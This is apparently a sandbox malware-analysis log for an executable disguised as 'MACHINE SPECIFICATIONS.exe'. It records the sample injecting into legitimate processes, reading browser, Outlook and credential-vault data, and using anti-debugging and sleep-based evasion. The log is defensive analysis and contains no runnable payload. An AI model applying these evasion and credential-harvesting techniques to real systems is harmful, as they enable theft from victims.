Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cmdkey.exe, 00000004.00000002.110846786441.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107468616539.0000000007EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: cmdkey.exe, 00000004.00000002.110843266469.0000000002FDF000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110843266469.0000000003000000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107463245182.0000000003000000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cmdkey.exe, 00000004.00000002.110846786441.0000000007F3E000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846786441.0000000007F4C000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.4.dr	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: MACHINE SPECIFICATIONS.exe	ReversingLabs: Detection: 47%
Source: MACHINE SPECIFICATIONS.exe	Virustotal: Detection: 33%

Source: unknown	Process created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe "C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe"
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
Source: C:\Windows\SysWOW64\cmdkey.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\cmdkey.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmdkey.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: MACHINE SPECIFICATIONS.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: MACHINE SPECIFICATIONS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MACHINE SPECIFICATIONS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MACHINE SPECIFICATIONS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MACHINE SPECIFICATIONS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MACHINE SPECIFICATIONS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MACHINE SPECIFICATIONS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: MACHINE SPECIFICATIONS.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: MACHINE SPECIFICATIONS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: AddInProcess32.pdb source: RAVCpl64.exe, 00000003.00000002.111799235023.000000000711C000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110843266469.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000003D3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000C7DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: cmdkey.pdbGCTL source: AddInProcess32.exe, 00000001.00000002.107284346063.0000000001008000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107287328226.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107283833885.0000000003308000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000001.00000002.107285179331.0000000001460000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000004.00000002.110844799317.000000000378D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107287328226.00000000034B1000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110844799317.0000000003660000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107283833885.0000000003308000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmdkey.pdb source: AddInProcess32.exe, 00000001.00000002.107284346063.0000000001008000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: RAVCpl64.exe, 00000003.00000002.111799235023.000000000711C000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110843266469.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000003D3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000C7DC000.00000004.80000000.00040000.00000000.sdmp

Source: MACHINE SPECIFICATIONS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: MACHINE SPECIFICATIONS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: MACHINE SPECIFICATIONS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: MACHINE SPECIFICATIONS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: MACHINE SPECIFICATIONS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: MACHINE SPECIFICATIONS.exe	Static PE information: section name: .fptable
Source: MACHINE SPECIFICATIONS.exe	Static PE information: section name: .stub

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0040505A push cs; iretd	1_2_00405061
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0040189C push ss; iretd	1_2_004018A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_004180AB push esp; ret	1_2_004180AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0040514D push ds; iretd	1_2_00405171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00411A63 push ebp; retf	1_2_00411A6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00407270 push 0000006Ch; iretd	1_2_0040727B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00418274 push esp; retf	1_2_00418281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00403340 push eax; ret	1_2_00403342
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_004174CC push esp; retf	1_2_004174D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_004045D4 push esp; iretd	1_2_004045DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00413663 push cs; ret	1_2_00413695
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00417630 push edi; ret	1_2_0041763A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0040D6A4 push ds; ret	1_2_0040D6B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00404F63 push esi; iretd	1_2_00404F66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014908CD push ecx; mov dword ptr [esp], ecx	1_2_014908D6
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0085E4A5 push esp; iretd	3_2_0085E4C2
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0085D8F7 pushad ; iretd	3_2_0085D902
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0085F404 push ecx; ret	3_2_0085F405
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0086E042 push eax; ret	3_2_0086E044
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0085DC5A push eax; iretd	3_2_0085DC5F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0085ED9C push ecx; iretd	3_2_0085ED9D
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_008659AE push eax; retf	3_2_008659B9
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_00865DEC push esi; retf	3_2_00865DF9
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0086053D push edx; iretd	3_2_0086053E
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0085E2B4 push edi; ret	3_2_0085E2B7
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0086A24E push ebp; ret	3_2_0086A250
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0085DBA2 push esp; iretd	3_2_0085DBA3
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_0085DF53 push ss; retf	3_2_0085DFCF
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036908CD push ecx; mov dword ptr [esp], ecx	4_2_036908D6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039B52B4 push edi; ret	4_2_039B52B7
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039C124E push ebp; ret	4_2_039C1250

Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	API/Special instruction interceptor: Address: 7FFDB198D144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	API/Special instruction interceptor: Address: 7FFDB1990594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	API/Special instruction interceptor: Address: 7FFDB198FF74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	API/Special instruction interceptor: Address: 7FFDB198D6C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	API/Special instruction interceptor: Address: 7FFDB198D864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	API/Special instruction interceptor: Address: 7FFDB198D004
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFDB198D144
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFDB1990594
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFDB198D764
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFDB198D324
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFDB198D364
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFDB198D004
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFDB198FF74
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFDB198D6C4
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFDB198D864
Source: C:\Windows\SysWOW64\cmdkey.exe	API/Special instruction interceptor: Address: 7FFDB198D604

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 1_2_014D1763 rdtsc

1_2_014D1763

Source: C:\Windows\SysWOW64\cmdkey.exe

Window / User API: threadDelayed 9089

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	API coverage: 1.0 %
Source: C:\Windows\SysWOW64\cmdkey.exe	API coverage: 1.3 %

Source: C:\Windows\SysWOW64\cmdkey.exe TID: 9108	Thread sleep count: 121 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 9108	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 9108	Thread sleep count: 9089 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe TID: 9108	Thread sleep time: -18178000s >= -30000s	Jump to behavior

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmdkey.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmdkey.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38BDD04 FindFirstFileExW,		0_2_00007FF6D38BDD04
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38BDE88 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_00007FF6D38BDE88

Source: cmdkey.exe, 00000004.00000002.110843266469.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: RAVCpl64.exe, 00000003.00000002.111783198082.00000000004FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: firefox.exe, 00000005.00000002.107576152077.0000019FCC6B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 1_2_014D1763 rdtsc

1_2_014D1763

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 1_2_00417AD3 LdrLoadDll,

1_2_00417AD3

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Code function: 0_2_00007FF6D38B63C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6D38B63C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01563157 mov eax, dword ptr fs:[00000030h]	1_2_01563157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01563157 mov eax, dword ptr fs:[00000030h]	1_2_01563157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01563157 mov eax, dword ptr fs:[00000030h]	1_2_01563157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148A147 mov eax, dword ptr fs:[00000030h]	1_2_0148A147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148A147 mov eax, dword ptr fs:[00000030h]	1_2_0148A147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148A147 mov eax, dword ptr fs:[00000030h]	1_2_0148A147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C415F mov eax, dword ptr fs:[00000030h]	1_2_014C415F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0152314A mov eax, dword ptr fs:[00000030h]	1_2_0152314A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0152314A mov eax, dword ptr fs:[00000030h]	1_2_0152314A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0152314A mov eax, dword ptr fs:[00000030h]	1_2_0152314A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0152314A mov eax, dword ptr fs:[00000030h]	1_2_0152314A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01565149 mov eax, dword ptr fs:[00000030h]	1_2_01565149
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C716D mov eax, dword ptr fs:[00000030h]	1_2_014C716D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01496179 mov eax, dword ptr fs:[00000030h]	1_2_01496179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014E717A mov eax, dword ptr fs:[00000030h]	1_2_014E717A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014E717A mov eax, dword ptr fs:[00000030h]	1_2_014E717A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B510F mov eax, dword ptr fs:[00000030h]	1_2_014B510F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149510D mov eax, dword ptr fs:[00000030h]	1_2_0149510D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C0118 mov eax, dword ptr fs:[00000030h]	1_2_014C0118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
